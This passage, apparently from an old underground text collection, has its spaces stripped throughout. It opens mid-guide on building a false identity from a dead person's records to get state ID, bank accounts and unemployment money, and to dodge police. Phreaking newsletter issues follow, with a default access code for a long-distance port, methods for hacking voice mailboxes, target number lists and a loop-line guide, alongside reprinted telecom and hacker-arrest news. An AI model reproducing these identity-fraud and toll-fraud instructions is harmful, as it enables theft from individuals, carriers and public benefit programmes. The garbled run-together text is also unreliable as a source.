writingin"Fuckyou",tryputtingintheword"Genealogy".Theygetthisall thetime.IftheDeathcertificatelooksgoodforyou,waitadayorsobefore gettingthecertifiedbirthcertificateincasetheyrecognizesomeonewanting itforadeadguy. STEP3 Nowyourcooking!Yougotyourstartandthenextpart'seasy.Crankoutyour oldDotmatrixprinterandrunoffsomemailinglabelsaddressedtoyouatsome phonyaddress.Takethetimetocheckyourphonyaddressthatthereissucha place.Hotelsthatrentbythemonthorlargeapartmentbuildingsaregood,be suretogettherightzipcodeforthearea.Thesearethingsthatthecops mightnoticethatwilltripyouup.Grabsomeoldjunkmailandpasteyournew labelsonthem.Nowtakethemalongwiththebirthcertificatedowntothe library. Getanewlibrarycard.Iftheyaskyouifyouhadonebeforesaythatyou reallyaren'tsurebecauseyourfamilymovedaroundalotwhenyouwereakid. MostlibrarieswillallowyoutouselettersasaformofIDwhenyougetyour card.Iftheywantmoregivethemasobstoryabouthowyouweremuggedandgot yourwalletstolenwithallyouridentification.Yourcardshouldbewaitingfor youinabouttwoweeks.MostlibrariesaskfortwoformsofID,onecanbeyour trustyBirthCertificate,andtheydoallowlettersaddressedtoyouasasecond form. STEP4 Nowyougotastart,itisn'tperfectyet,solet'scontinue.Youshouldhave twoformsofIDnow.Throwawaytheoldletters,orbetteryetstufftheminside thewalletyouintendtousewiththisstuff.Gotothecountycourthouseand showthemwhatniceIDyougotandgetastateIDcard.Nowyougotapicture ID.Thiswilltakeabouttwoweeksandcostabout$5,itswellworthit. STEP5 Ifthedeathcertificatehadasocialsecuritynumberonityoucangooutand buyoneofthosemetalSS#cardsthattheysell.Ifitdidn't,thenyougotall kindsofprettyIDthatshowsexactlywhoyouare.Ifyoudon'tyethaveanSS#, Godownandapplyforone,thesearefreebuttheycouldtakefiveorsixweeks toget,Bureaucratsyouknow...YoucaninventaSS#tooifyoulike,butthe mottoof'THEWALKINGGLITCH'hasalwaysbeen"Whynotexcellence?". STEP6 Ifyouwanttogowholehogyoucannowgetabankaccountinyournewname.If youplantodoalotoftravelingthenyoucanputalotofmoneyintheaccount andthensayyoulosttheaccountbook.Afteryougetthenewbookyoutakeout allthecash.They'llhityouwithaslightchargeandmaybetieupyourmoney some,butifyou'reeverbrokeinsomesmalltownthatbankbookwillkeepyou frombeingthrowninjailasavagrant. ALLDONE? Sokiddies,yougotIDforbuyingbooze,butwhatelse?Insometowns(the largerthemorelikely)thecopsiftheycatchyouforsomethingpettylike shopliftingstuffunderacertaindollaramount,willjustgiveyouaticket, samethingforpissinginthestreet.That'sit!Nofingerprintsornothing, justpaythefine(almostalwaysover$100)orappearincourt.Ofcoursethey runaradiocheckonyourID,you'llbecleanandyouralteregogetsabloton hisrecord.Yourfreeandclear.That'sworththepriceofthetroubleyou've gonethroughrightthere.Ifyoursmart,you'lltossthatIDawayifthis happens,orbetteryet,tearoffyourpictureandgivetheIDtosomeoneyou

don'tlike,maybethey'llgetbustedwithit.Ifyou'reaworkingstiff,here's awaytostretchyourdollar.Gotoworkforaslongasittakestoget unemploymentandthengetyourselffired.Gotoworkundertheothernamewhile yourgettingtheunemployment.WithacoupleofsetsofID,youcanlivelikea king.TheseconceptsforsurvivalinthenewagecometoyoucomplimentsofTHE WALKINGGLITCH. 89.RemoteInformerIssue#2byTracker,NormanBates,andYeCap'n RaggersandBraggers Thissectionistomakeyouawareofwellknownraggersandbraggers.Since thisisthefirsttimethissectionisbeingprinted,wewilltellyouwhat classifiespeopleasraggersandbraggers.Inthefutureissuesthetopraggers andbraggerswillbelistedinthisnewslettertolettheSysOpsknowwhonot toletontheirboard,ortoatleastkeepaneyeon.Araggerissomeonewho willputsomeoneelsedownforsomething.Thepersonmightpostamessage askinganovicequestionabouthackingandphreaking,ormaysaysomething thatiscompletelywrong,andaraggerwillputtheotherpersondownforhe said,posted,etc.Theonesthatusuallyclassifyinthiscategoryaretheones thatthinktheyknowitallandconsiderthemselvesrightnomatterwhat anyonesays.Mostoftheusersthatusecodesandconsiderthemselvesa masterphreakerusuallybecomeraggers. Abraggerissomeonewhoeitherdoesorthinkshedoesknoweverything,andputs ituponhimselftotellthewholeworldthatheknowsitall.Thisperson isalsoonewhothinksheisbetterthaneveryoneelseandhebelievesheis Elite,andnooneelseis.Peoplewhotendtodothisarethosewhohave,for somereason,becomewellknownintheunderworld,andasaresultbecomea bragger.Thoseusuallynottoowellknownwillnottendtobragasmuchas thosewhothinkeveryonewouldlovetobetheirfriendandbelikethem. Asawellknownraggerandbragger,TheToad,learnedthatitdoesnothelpto beoneorbothofthose.Hehassincechangedandisnoweasilyacceptedby most.Mostpeopledislikedhimbecauseotherstheyknewhadsaidsomethingbad abouthim.Thisiscalledpeerpressureandisabadinfluencetothosewho arenewtotheunderworld.Iwouldsuggestinthefuture,tonotjudgesomeone bywhatotherssay,butratherbyhowtheyactaround/toyou.Thecurrentmost popularAtarianthatclassifiesasaraggerandabraggerisAceofAces,andis wellhatedbymanyusersandSysOps,sincehetendstoputdownanythinganyone saysandconsidershimselfthebestatwritinghackingprograms.Heiscommonly referredtoasAssofAssesandAssofAssholes.Evenholdinganopenmindabout thisguy,youwouldsooncometofindthatwhatotherssaidcoincideswithwhat youseefromhim. ANew950hasarrived! LDDS,whoasmentionedaboveboughtoutTMC,isinstallinganew950portto mostmajorcities.Bythetimeyoureadthis,itshouldbeinalmostevery areathatsupports950ports.Thenumberis9501450.Thisportwilldial976 numbers,butnot700,800,or900numbers.ThedialingmethodforLDDSis:7 digitcode,thenevenifthecodeisbaditwillgiveyouadialtone.Then dialtheareacodeplusthenumber.Ifyouhaveabadcodeitwillsimplysay yourcallcannotbecompletedasitwasdialed.Thereisadefaultcodeusedon thesystemthatcurrentlyworks.Thecodeissimply,1234567.Ihaveseen codesfrom5differentcompaniesandtheyallareintheformatof00xxxxx.I donotknowwhattypeofsoftwaretheyuse,butIwillknowbythenext issueexactlywhattheyplaceonthebills.Thiscouldbetheanswerto alotofpeople'sproblemswithfearofSprintandITT,especiallyAllNets. Justremember,Trackeristheonewhofoundthis,andallinformation aboutit.Ifsomeoneisseensayingtheyfoundthis,thentheywillbe listedinthenextissuewhichwillcontainanarticleonleeches. MailboxSystems

Mailboxsystemsarethelinkbetweeninformationandtheunderworld.Ifyouhave evercalledone,thenyouwillknowtheadvantagesofhavingone,especiallythe onesthatareopentowholeunderworld,ratherthanjustaselectfew.There aretwotypesofmailboxsystemsthatarewidelyused.Thefirsttypewe willtalkaboutisthemultiplemailboxsystems,orcommonlyreferredtoas messagesystems.Thesesystemshaveseveralmailboxessetupononenumber. Usually,youcanaccessothermailboxesfromthatnumberbypressing'*'or '#'.Sometimesyoujustenterthemailboxnumberandyouareconnected.These arethesafestsystemstousetoprotectinformationfromUSSprintandother longdistancecompanies.SinceUSSprintandothercompaniescallthe destinationnumbers,itissafertohave800mailboxsystems,andmostof thetime,themultiplemailboxsystemsareon800numbers.Thepasscodeon thesesystemscanvaryinlengthandcanbeaccessedbyseveraldifferent methods,soitisimpossibletoexplainexactlyhowtohackthesesystems. Theothertypeisthesinglemailboxsystem.Theseareusuallysetupina reservedprefixinanareacode.(Ex:7136846xxx)Thesesystemsare usuallycontrolledbythesametypeofhardware/software.Toaccessthearea whereyouenterthepasscode,justhit'0'forasecondorso.Thepasscodes arefour(4)digitslong.Theonlywaytohacktheseismanually.Thebest thingyoucoulddoistofindonethatdoesnothavearecordingfroma person,butjustthedigitizedvoice.Ifyouhackonethatsomeonealready owns,theywillreportitanditwillnotlastaslong. Hereisalistmailboxesorprefixestohelpyougetstarted Single Multiple Name Digits 2132818xxx 2127142770 3 2132858xxx 2165865000 4 2135152xxx 4153387000 AspenMessageSystem 3 2147335xxx 7144742033 WesternDigital 2148556xxx 8002220651 VincentandElkins 4 2149782xxx 8002338488 3 2159492xxx 8004478477 Fairylink 7 3124508xxx 8005215344 3 3137681xxx 8005242133 RCA 4 4055578xxx 8005270027 TTETeleMessager 6 6022304xxx 8006327777 Asynk 6 6194928xxx 8006457778 SoftCellComputers 4 7136846xxx 8006489675 Zoykon 4 8008470003 CommunicationsWorld 3 90.RemoteInformerIssue#3byTracker,YeCap'n,NormanBates Introduction It'sbeenamonthnow,andALOThashappened.Somuch,infact,thatthe informationwillbesplitintoseveralissues.ThisshouldbenoshocksinceI mentionedinthefirstissuethatwemayputseveralissuesoutsometimes.I wanttocongratulatethereadersforfinallycontributingtothenewsletter. ThisfirsttwoissueswerealloninformationthatI,myself,obtained.Several peoplegavemeinformationfortheseissues,andtheirhandleandinformationis includedinthearticles. ITThas9digits! Forthoseofyouwhodidnotknowthis,ITThasninedigitcodes.Theyaresaid togivebetterconnectionstosomeextent.Thisinfowasoriginallygiventous byPartyBeast. PhreakyPhonesGoDown! ThefamedPhreakyPhonesaredownagain.ModemMan,theoriginalpersonthat startedthem,hassaidthattheywillbedownuntilfurthernotice.Inthe

meantime,otherindependentboxesarebeingstarted.Alistingcanbemadeof currentonesonrequest. MagnusAdeptGetsBusted FellowAtarianandwellknownphreakMagnusAdeptgotcaughtbyMCI.Detailsof thehow,when,andwherearenotknownatthistime.Hegotcaughtwith150 codesandmayhavetopayupto50dollarsforeachcode. SprintCodesAreDyingFast! Sprintcodesarehardtogetandwhentheyareobtained,theytendtodierather quickly.Phreakershavebeensayingthatthe9500777portisdead,butonthe contrary,itisstillavailableinstatesthatarenothighlyabusedbyphreaks. Hereagain,rumorsarebeingspread. TheBestBBSoftheMonth Startingfromnowon,wewillhaveaBBSofthemonth.WewillchooseaBBS, regardlessofcomputertype,andlookattheuserparticipationinphreak relatedmatters,aswellasqualitydiscussionsonthevariousillegaltopics.A BBScanremaintheBBSofthemonthaslongastheyresideabovetherestofthe BBSsystems.Eventhoughwewillsometimesbringoutmorethanoneissueina month,theboardwillremainBBSofthemonthuntilthefirstissueinthenext monthcomesout. Thismonth'sBBSofthemonthisFBIPirateNet.Wechosethisboardbecauseof thelargenumbersofpostsinthebases,andnotonlyinformation,but discussionsaswell,withaminimumnumberofpostsfromraggersandbraggers. Thenumberforitis5166617360.TheSysopofFBIPirateNetisThePhantom, nottobeconfusedwithanearlierNARC. USSprintExpectedtoTrimStaff,ConsolidateDivisions NewYorkUSSprintCommunicationsCorp.,thetroubledlongdistancecarrier, isexpectedtoannouncesoonthatitwillcutitsworkforcebyseveralhundred peopleandreduceitssevenregionaldivisionsto3operatinggroups,sources familiarwiththecompanysaid. Thecompany'sPacificdivisionisbasedinBurlingame,CA.Thelayoffsand reorganizationarepartofaplanbyUSSprint'snewpresident,RobertH. Snedaker,toreduceheavyoperatinglosses,whichanalystsexpecttoreachmore than$800millionthisyear. SnedakerreplacedCharlesM.Slibo,whowasforcedtoresigninJulybecause losseswererunningmuchhigherthantheparentcompanieshadexpected.Problems withthecompany'scomputerizedbillingsystemalsocontributedtoSkibo's ouster.USSprintisownedandoperatedbytheGTECorp.andUnitedTeleCom. AccordingtosourcesclosetoSnedaker,whowasvicechairmanandchief operatingofficerofUnitedTeleCom,heisplanningtoconsolidatethecompany's 7divisions,whichoperateinthesamegeographicalregionsastheseven regionalBelloperatingcompanies,into3divisions. Therationaleforthemove,accordingtoindustryanalysts,isthatthecompany willneedamuchsmallerworkforceonceitbeginshandlingallit'sphone trafficonit'snewfiberopticnetwork,whichcancarryagreaternumberof telephonecallsatlesscost.Companyofficialshavesaidthattheyexpectto havemostofthetrafficonthenetworkbyearlynextyear.Onesourcesaidthat therewouldbemorethanoneroundoflayoffsinthecomingmonthsandthatthe companyultimatelyplanstoreduceits14,000memberworkforceby15percent. SeveraltopmanagersareexpectedtoresignassoonasUSSprintcentralizesits marketingandsupportoperationsasitsheadquartersinKansasCity,MO., accordingtoareportinthelatestissueofBusinessWeekmagazine.

AspokesmanforUSSprintsaidonFridaythatthecompanywouldnotcommenton therumors.Thecompanyisthenation'sthirdlargestlongdistancecompany, aftertheAmericanTelephoneandTelegraphCo.(AT&T)andMCICommunicationsCo. Lastyear,WashingtonbasedMCIundertookasimilarreorganizationinwhichit posteda$502millionlosstowritedownoldinventoryandrestructure operations. AnalystssaidthatisUSSprintistoturnaprofit,thecompanymustincrease itsmarketshare."Todothis,USSprintmustgainmorelargebusiness customers,whichaccountforabout80percentofindustryrevenues,"saidRobert B.MorrisIII,SecuritiesinSanFrancisco. Morrissaidthatbyusingaslickmarketingcampaigntodifferentiateitsall fibertelephonenetworkfromthoseofcompetitors,USSprintmorethandoubled itscustomerbaselastyear.But"mostofthesecustomerswereresidentialand smallbusinessusersthataddedlittletoSprint'sbottomline,"headded."If thecompanyexpectstobeprofitable,itwillhavetoconcentrateonproviding thebestservicetovolumeusers." SecretServiceCracksDownonTeenHackers MountLebanon,PATheUSSecretServiceandlocalpolicedepartmentshaveput ascareintothehackercommunitywithanationwidecrackdownoncomputercrime thathasresultedinthearrestsofteenagehackersinatleastthreecities. "Peoplewhomonitorthebulletinboardssaytherearealotofnervoushackers outthere,wonderingwhowillbearrestednext,"saysRonaldE.Freedman,vice presidentofAdvancedInformationManagement,aWoodbridge,VAbasecomputer securityfirm. NineteenagersfromMountLebanonJuniorSeniorHighSchoolnearPittsburg,PA, werearrestedrecentlyandchargedwithcomputerfraud.Thejuvenilesallegedly usedhomecomputerstogainillegalaccesstoacreditcardauthorization center.Theyobtainedvalidcreditcardnumbersandusedthemtopurchase thousandsofdollarsworthofmailordermerchandise,thepolicesaid. Freedmansaysitappearsthehackersusedsomerelativelysophisticated techniquesinthescheme,includingspeciallywrittensoftwarethatenabledthem tobypasssecuritycontrolsandnavigatethroughcreditrecordstoobtainkey information. Policeofficialssaythatthehackersalsoobtainedaccesscodesfrompirate bulletinboardsystemstomakefreelongdistancecallsandgainaccessto variousbusinessandgovernmentcomputers. Thearrestsweretheresultofa6weekinvestigationbytheSecretServiceand theMountLebanonpolice.Thepoliceweretippedoffbyparentswhowere suspiciousabouthowtheirsonmanagedtoobtainaskateboardvaluedat$140. TheSecretServicewasalsoinvolvedininvestigationsthatledtothearrests ofseveralhackersinSanFranciscoandNewYorklastJuly. SecretServicespokesmanWilliamCorbettsaysthatalthoughsomereportshave portrayedthehackersaspartofanationalcrimering,thecasesareunrelated. "It'sjustthatafewofthesecomputershackingcasescametoaheadatabout thesametime,"hesays. FederalLegislationenactedin1984givestheSecretService,partofthe DepartmentoftheTreasury,amajorroleininvestigatingcomputercrimes.Under thefederalComputerFraudandAbuseActof1986,computerfraudisafelony thatcarriesamaximumpenaltyof5yearsforthefirstoffense,and10years

forthesecond.Displayingunauthorizedpasswordsonhackingbulletinboards carriesamaximumpenaltyof1yearinprisonforthefirstoffense,and10 yearsforthesecond. GermanTeensCrackNASA Washington,D.C.AgroupofWestGermanteenagersfromtheChaosComputer ClubpenetratedaNASAnetworkrecently,sayingtheyweredoingitto"testthe security." WhattheygotintowasSPANNet,acomputernetworkwithabout700notes,which isactuallybasedattheGoddardSpaceCenterinMaryland.Allthat'sinthere isunclassifieddata,spacescienceinformation,andpostflightdataanalysis. "AnyonewithNASArelatedresearchcanapplyforaccesstoSPAN"saysa spokesman,whoaddsthatthenetworkrunsonDECVAXhardware."Wepickedup threeattemptstogainaccessandputinsecurityprecautionssoitwouldn't happen."Hispersonalopinionis,"We'rehappythattheycouldn'tgetbackin, anddecidedtogopublic."HealsoaddedthatNASAhasmanyothernetworks,many oftheclassifiedand"probablyimpenetrable.ButIdonotwanttochallenge anybody." How'dtheygetin?ProbablytheygotaWestGermanNASAlicensee,whichgave themavisitor'spass,thentheycreatednewpasswordswithunlimitedsecurity forthemselves,afterwhichgettingaroundthenetworkwaseasy. 91.RemoteInformerIssue#4byTracker,NormanBates,YeCap'n SwitchingSystems Therearecurrentlythreedifferentformsofswitchingsystemsthatarepresent intheUnitedStatestoday.StepbyStep(SxS),Crossbar,andtheElectronic SwitchingSystem(ESS)makeupthegroup.Phreakshavealwaysbeenalittle tentativewhenitcomesto"doingtheirwork"oncetheyhaveheardabouteffects ofswitchingsystemsontheirhobby.Afterresearchingthistopic,Ihavefound thattherereallyisnotthatmuchtobeworriedabout.Readon,whileIshare withyouinformationwhichIhavecompiledaboutalloftheseswitchingsystems andtheirdistinctfeatures. ThefirstswitchingsystemthatwasusedinthecountrywascalledStepbyStep. Thiswasadoptedin1918byBell,anduntil1978,theyhadover53%ofalltheir exchangesusingStepbyStep(SxS).Thissystemisknownforit'slong, confusingtrainofswitchesthatareusedforitsstepbystepswitching. StepbyStephasmanydisadvantagestophoneusers.Theswitchtrainbecomes jammedfairlyoften,anditcausescallstobeblocked.Also,SxSdoesnotallow theuseofDTMFdialing.ThisaccountsforsomeoftheareasintheUnited Statesthatcannothavetouchtonedialingabilities.Atremendousamountof electricityandmaintenanceneedstoaccompanytheSxSswitchingsystem,which makesitevenmoreimpratical.Allinall,thisisprobablythemostarchaic switchingsystemaround. ThereareanumberofwaystoseeifyouareonSxS.Youwillnoticethatthere arenopulsingdigitsafterdialing.Mostsourcessaythatthephonecompany willsoundlikemanytypewriters.SxSdoesnotofferfeaturessuchasspeed calling,callforwarding,threewaycalling,callwaiting,andothersuch services.PayphonesonSxSalsowillwantyourmoneybeforeyoureceiveadial tone.ThisaddstothelistofdisadvantageslabeledtothatoftheStepbyStep switchingsystems. AnothertypeofswitchingsystemthatisprevalentintheUnitedStatesis Crossbar.CrossbarhasbeenBell'sprimaryswitcherafter1960,andthreetypes ofitexists.Number1Crossbar(1xB),Number4Crossbar(4xB),andtheNumber 5Crossbar(5xB).InCrossbar,aswitchingmatrixisusedforallthephonesin anarea,andwhensomeonecalls,therouteisdeterminedandismetupwiththe

otherphone.Thismatrixissetupinhorizontalandverticalpaths.Unlike otherswitchingsystems,inmyresearch,Icouldnotcomeupwithanytrueand definitedistinguishingfeaturesoftheCrossbarswitchingsystems. TheElectronicSwitchingSystem(ESS)isyetanotherswitchingsystemusedin theUnitedStatesandthemostusedofallthreeswitchingsystems.ESSisan extremelyadvancedandmultifacedtypeofswitchingsystem,andisfearedby maraudersofthephonecompanyeverywhere.WithESS,yourphonecompanyisable toknoweverydigitdialed(includingmistakes),whoyoucall,whenyoucalled, andhowlongyouwereconnected.ESSisalsoprogrammedtoprintoutthe numbersofpeoplewhomakeexcessivecallstoWATSnumbers(800services)or directoryassistance.ThisfeatureofESSiscalled800ExceptionalCalling Report,andhasspelledtheendofsomeformsofcontinuouscodehacksto certainextenders.ESScanalsobeprogrammedtoprintlogsofwhocalledand abusedcertainnumbersaswell.Everythingiskepttrackofinitsrecords. TheaforementionedfactsshowthatESShasmadethejobsoforganizationssuch astheFBI,NSA,andotherphonecompanysecurityforceseasier.Tracingcanbe doneinamatterofmicroseconds,andtheresultwillbeconvenientlyprinted outonthemonitorofaphonecompanyofficer.ESSisalsoprogrammedtopick upany"foreigntones"onthephonelinesuchasthemanyvariedtonesemulated byboxes. ESScanbeidentifiedbyafewfeaturescommoninit.The911emergencyservice iscoveredinthelaterversionsofESS.Also,youaregiventhedialtone firstwhenusingapayphoneunlikethatofSxS.Callingserviceslikecall forwarding,speedcalling,andcallwaitingarealsocommontoESS.Oneother featurecommontoESSisANI(AutomaticNumberIdentification)forlongdistance calls.Asyoucansee,ESSisbasicallythezenithofallswitchingsystems, anditwillprobablyplaguetheentirecountrybytheearly1990's.Soonafter, weshouldbelookingforwardtoasystemcalledCLASS.Thisswitchingsystem willcontainthefeatureofhavingthenumberofthepersonthatiscallingyou printedoutonyourphone. WhathaveIconcludedabouttheseswitchingsystems?Well,theyarenotgood enough.Iknowafewpeopleemployedbythephonecompany,andIknowfora factthattheydonothaveenoughtimethesedaystoworryaboutcodeusers, especiallyinlarge,metropolitanareas.So,Iwillgooutonalimbhere,and saythatalargeportionofpeoplewillneverhavetoworryaboutthehorrorsof ESS. NewGizmoCanChangeVoiceGender ThemostamazingdevicehasturnedupinthenewHammacherSchlemmercatalog: thetelephonevoicegenderchanger.Whatitdoesischangethepitchofyour voicefrom,say,sopranotobassamostefficientwaytodissuadeanobscene phonecallerjustashe'sgettingwarmedup.Thatisnotthesameasrunninga 45rpm.recordat33.Indigitalconversion,thepitchcanbechangedwithout alteringthespeed. Thedevicerunsona9voltbatterandattachestothetelephonemouthpiece witharubbercouplerthattakesbutamomenttosliponandoff.Withthe changerswitchedon,saysLloydGray,aHammacherSchlemmertechnicalexpert, "theeffectissimilartowhatyouhearwhentheyinterviewananonymouswoman ontelevisionanddisguisehervoicebydeepeningit.""It'sbetterforchanging awoman'svoicetoaman'sthantheotherwayaround,"Graysaid.Amancanuse ittoraisethepitchofhisvoice,buthestillwon'tsoundlikeawoman." Amancould,however,usethechangertodisguisehisvoice.Butwiththedevice setonhigh,Gray'svoicestillcouldbeidentifiedashisown.Onlow,his normaltenorbecamesogravellikethatthewordswereunintelligible. 92.RemoteInformerIssue#5byTracker,NormanBates,andYeCap'n

AT&TRates WASHINGTONAmericanTelephone&TelegraphCo.proposedTuesdaytolowerits interstatelongdistanceratesbyanaverageof3.6%toreflectreducedcostsin connectingtothelocaltelephonenetwork.Thelargestdecrease6.3%would beseenindaytimeprices"Becauseoftheneedtomakethoseratesmore competitive,"AT&Tsaid. Ratesforcallsmadeduringeveninghourswoulddrop2.2%andcallsmadeduring thelatenightandweekendswouldbecutby0.8%,thecompanysaid.Therate reductionswouldtakeeffectJan.1,iftheyareapprovedbytheFederal CommunicationsCommission.Reactingtotheproposedpricecuts,MCI CommunicationsCorp.andUSSprintCommunicationsCo.,thenation'ssecond largestandthirdlargestlongdistancecompaniesrespectively,saidtheir responsewoulddependonwhattheFCCfinallyapprovesbutbothsaidthey intendedtoremaincompetitivewithAT&T.AT&T,thenation'slargestlong distancecompany,proposedtotheFCCthatitsratesdropasmuchas$800 million,butAT&Tsaidtheexactamountwilldependontheaccesschargesthe FCCallowsthelocaltelephonecompaniestocollectfromlongdistancecarriers, whichmustpaythefeestohookintothephonelocalnetwork. AT&ThaschallengedthenewaccessratesfiledbytheregionalBelloperating companies,contendingtheyaremorethan$1billiontoohigh.Inproposingits newrates,thelongdistanceleadertoldtheFCCitexpectslocalcompanies' accessfeestofallbyatleast$200millionwhichwouldamounttoanaverage ratereductionoflessthan1%.ButthecompanysaiditbelievestheFCCwill orderanadditional$600millioninreductionsbasedonAT&T'schallenge. "We'reconfidenttheFCCwillrecognizethataccesschargesfiledbythelocal telephonecompaniesneedtobesubstantiallyreduced,whichwouldmeanmore savingsforourcustomers,"saidLarryGarfinkel,AT&Tvicepresidentfor marketing.Hesaidthecompanyfileditsproposedratesbasedondisputed chargesbecause"wewantedtoletthepublicreact...andfurthertoletthe FCChavefullknowledgeofwherewewereheadinggivenourexpectationthatwe hadavalidbasisforourdispute." AT&T'slongdistancerateshavefallenbyabout34%sincethecompanywas strippedofitslocaloperatingcompaniesbyanantitrustdecreenearlyfour yearsago.Sincethen,phoneratepayershavebeenpayingalargershareofthe costsofmaintainingthelocalnetworkthroughmonthlysubscriberlinecharges, now$2.60forresidentialcustomers.Thathasreducedthelongdistance companies'shareoflocalnetworkexpenses,whichtheypayintheformofaccess charges.JackGrubman,atelephoneanalystwithPaineWebberInc.,saidAT&T's proposaltargetsbusinesscustomersbecause"that'swherethecompetitionisand wherethebetter(profit)marginsare."Inaddition,itaimstokeepthe pressureoncompetitionininternationalcallingbyextendingdiscountstomore customers.Grubmanaddedthat,ifthecompany'srateproposalisapprovedbythe FCC,hewouldexpectnofurthercutsinAT&Tratesin1988.WendellLind,AT&T administratorofratesandtariffs,saidthecutsforbusinessandresidential customersareaboutthesamebecausebusinesscutsareoffsetbyaproposed$128 millionincreaseinAT&T'sprivatelinerates. AT&TistheonlylongdistancecompanywhoseratesareregulatedbytheFCC,but itspricessetthepacefortheindustry.ThoughAT&Tisfarlargerthananyof itscompetitors,itsmarketsharehasbeendecliningsincedivestitureandthe companynowsaysitservesabout75percentofthemarket.Inadditiontothe reductionsinbasiclongdistancerates,AT&Tproposedcuttingpricesby5%and 5.7%foritsProAmericacallingplans.Thecompanyalsoproposedtoreduce pricesby2.9percentforits800Servicecustomersand4.4percentforWATS customers,althoughitwouldincreasethemonthlyaccesslinechargesforthose plansby$3.20toreflecthigherspecialaccesschargesfiledbythelocalphone companies.

USSprintOperatorServiceTrafficIncreases40% ORLANDO,Fla.USSprintWednesdayannounceditslongdistanceoperatorswho begansaying,"MayIhelpyou?"justfivemonthsago,arenowhandling3 millioncallsamonth. Thefiberopticlongdistancecarrier,offeringtheonlyoperatorservice alternativetoAT&Thasexperienceda40percentgrowthinoperatorservice callssinceitannounceditsserviceJuly1.AmandaWeathersby,USSprintvice presidentofproductmarketing,saidTuesday,"Moreandmorepeoplearetaking advantageofourcallcompletionassistanceandalternativebilling arrangements."CustomersurchargesarethesameasAT&Twiththeaddedbenefit ofUSSprint'sfiberopticqualityandlowerlongdistancerates."USSprint currentlyofferspersontoperson,stationtostation,callcompletionand collectcalling.USSprinthasannouncedanagreementwithUSWESTServiceLink thatwillallowanyonetocallonUSSprintandchargetheircallstoaRegional BellOperatingCo.callingcardbeginninginfirstquarter1988. "Previously,ouroperatorservicewasavailableonlyonpresubscribedUSSprint phonesandrecentlyweaddedoperatorassistanceforUSSprintFONCARD customers,"Weathersbysaid."Withthisnewagreement,we'llbeabletoexpand ouroperatorservicetomarketssuchaspayphones,hospitals,and hotels/motels."Thenewest24houroperatorservicecenterinDallasbegan operationsonOct.5.USSprint'sotheroperatorservicecentersarein:Cherry Hill,NJ;Atlanta;Lombard,ILandReno,NV.USSprintisajointventureof UnitedTelecommunicationsInc.ofKansasCity,MOandGTECorp.ofStamford, Conn. PacificBellPursuingCallingCardThief SANFRANCISCO(BW)PacificBelliswarningconsumerstoprotecttheir telephonecallingcardslikeanyothercreditcardinthewakeofaseriesof fraudsbypeopleposingasphonecompanyemployees.APacificBellspokesman sayscustomersinthe213,805and916areacodesarebeingvictimizedby someonewhosaysheisatelephonecompanyemployeeinvestigatingcallingcard fraud.Theindividualcallspeopleathomeatoddhours,askingfortheir callingcardnumbers.Hethensellsthenumberstopeoplewhousethenumbers tomakelongdistancephonecalls. AsrecentlyasMondayofthisweek,180longdistancecallswerebilledtoa Sacramentoarearesidentwhohadgivenhisnumbertothethiefjustthreehours earlier.AccordingtoPacificBell,thiskindofschemeandotherformsof callingcardfraudcosttelephonecustomersnationwidehalfabilliondollarsa year.Thecompanyofferedthesetipstoconsumerstoavoidbecomingavictim ofcallingcardfraud: Nevergiveyourcallingcardnumberorpersonalidentificationnumbertoanyone. Anytelephonecompanyemployeewithalegitimateneedtoknowthenumberhas accesstoit.Treatyourcallingcardlikeanyothercreditcard.Reportits lossimmediatelybycallingthe800numberonthebackofthecard8006210430. Ifyoureceiveasuspiciouscallregardingyourtelephonecallingcard,report itbycallingthe800numberonthebackofthecard.Ifyoureceiveacallfrom someoneclaimingtobeatelephonecompanyemployeeandaskingforyourcalling cardnumber,askforanameandnumbertocallback.Thencallthelocal PacificBellbusinessofficetoreporttheincident. OnesuspectwasarrestedinSouthernCalifornialastweekbyaquickthinking customerwhodidjustthat.PacificBellimmediatelycontactedthelocalpolice department.Asuspectholdingsevenstolencallingcardnumberswasarrested minuteslater.PacificBellandlongdistancetelephonecompanieswillcredit customersforcallingcardchargesdeterminedtobefraudulent.PacificBellis asubsidiaryofPacificTelesisGroup,adiversifiedtelecommunications corporationbasedinSanFrancisco.

93.ThePhreaker'sGuidetoLoopLinesbyTheJollyRoger Aloopisawondrousdevicewhichthetelephonecompanycreatedastestnumbers fortelephonerepairmenwhentestingequipment.Bymatchingthetoneofthe equipmentwiththetoneoftheloop,repairmencanadjustandtestthesettings oftheirtelephoneequipment.Aloop,basically,consistsoftwodifferent telephonenumbers.Let'suseAandBasanexample.NormallyifyoucallA,you willhearaloudtone(thisisa1004hztone),andifyoucallB,thelinewill connect,andwillbefollowedbysilence. Thisistheformatofaloopline.Now,ifsomebodycallsAandsomeoneelse callsBViola!AandBlooptogether,andoneconnectionismade.MaBelldid thissorepairmencancommunicatewitheachotherwithouthavingtocalltheir ownrepairoffice.Theycanalsousethemtoexchangeprograms,likeforANAor Ringback.Also,manyCO'shavea"LoopAssignmentCenter".Ifanyonehasany informationonthesecenterspleasetellme.Anyway,thatishowaloopis constructed.Fromthisinformation,anyonecanfindanactualloopline.Going backtotheAandBexample,Note:thetonesideandthesilentsidecanbe eitherAorB.Don'tbefooledifthephonecompanydecidestoscramblethem aroundtobecute.Asyounowknow,loopscomeinpairsofnumbers.Usually, rightaftereachother. Forexample:8179721890 and 8179721891 Or,tosavespace,onelooplinecanbewrittenas8179721890/1.Thisisnot alwaystrue.Sometimes,thepatternisinthetensorhundreds,and, occasionally,thenumbersarerandom.Incities,usuallythephonecompanyhas setasideaphonenumbersuffixthatloopswillbeusedfor.Manydifferent prefixeswillcorrespondwiththatonesuffix.InArlington,Texas,apopular suffixforloopsis1893and1894,andalotofprefixesmatchwiththemtomake thenumber. ForExample:8174601893/4 8174611893/4 8174651893/4 8174671893/4 8174691893/4 ...areallloops... orashorterwaytowritethisis: 817xxx1893/4 xxx=460,461,465,467,469 Note:Youcanmixandmatchapopularsuffixwithotherprefixesinacity,and almostalwaysfindotherloopsortestnumbers. Note:ForHouston,theloopsuffixesare1499and1799.AndforDetroitit's 9996and9997.Whentherearealargenumberofloopswiththesameprefix format,chancesarethatmanyloopswillbeinterlocked.Usingtheabove exampleofArlingtonloopsagain,(Iwillwritetheprefixestosavespace)460, 461,and469areinterlockedloops.Thismeansthatonlyonesidecanbeusedat agiventime.Thisisbecausetheyareallonthesamecircuit.Toclarify,if 8174611893iscalled,817460and4691893cannotbecalledbecausethat circuitisbeingused.Essentially,interlockedloopsareallthesameline, butthereareavarietyoftelephonenumberstoaccesstheline. Also,iftheoperatorisaskedtobreakinonabusylooplinehe/shewillsay 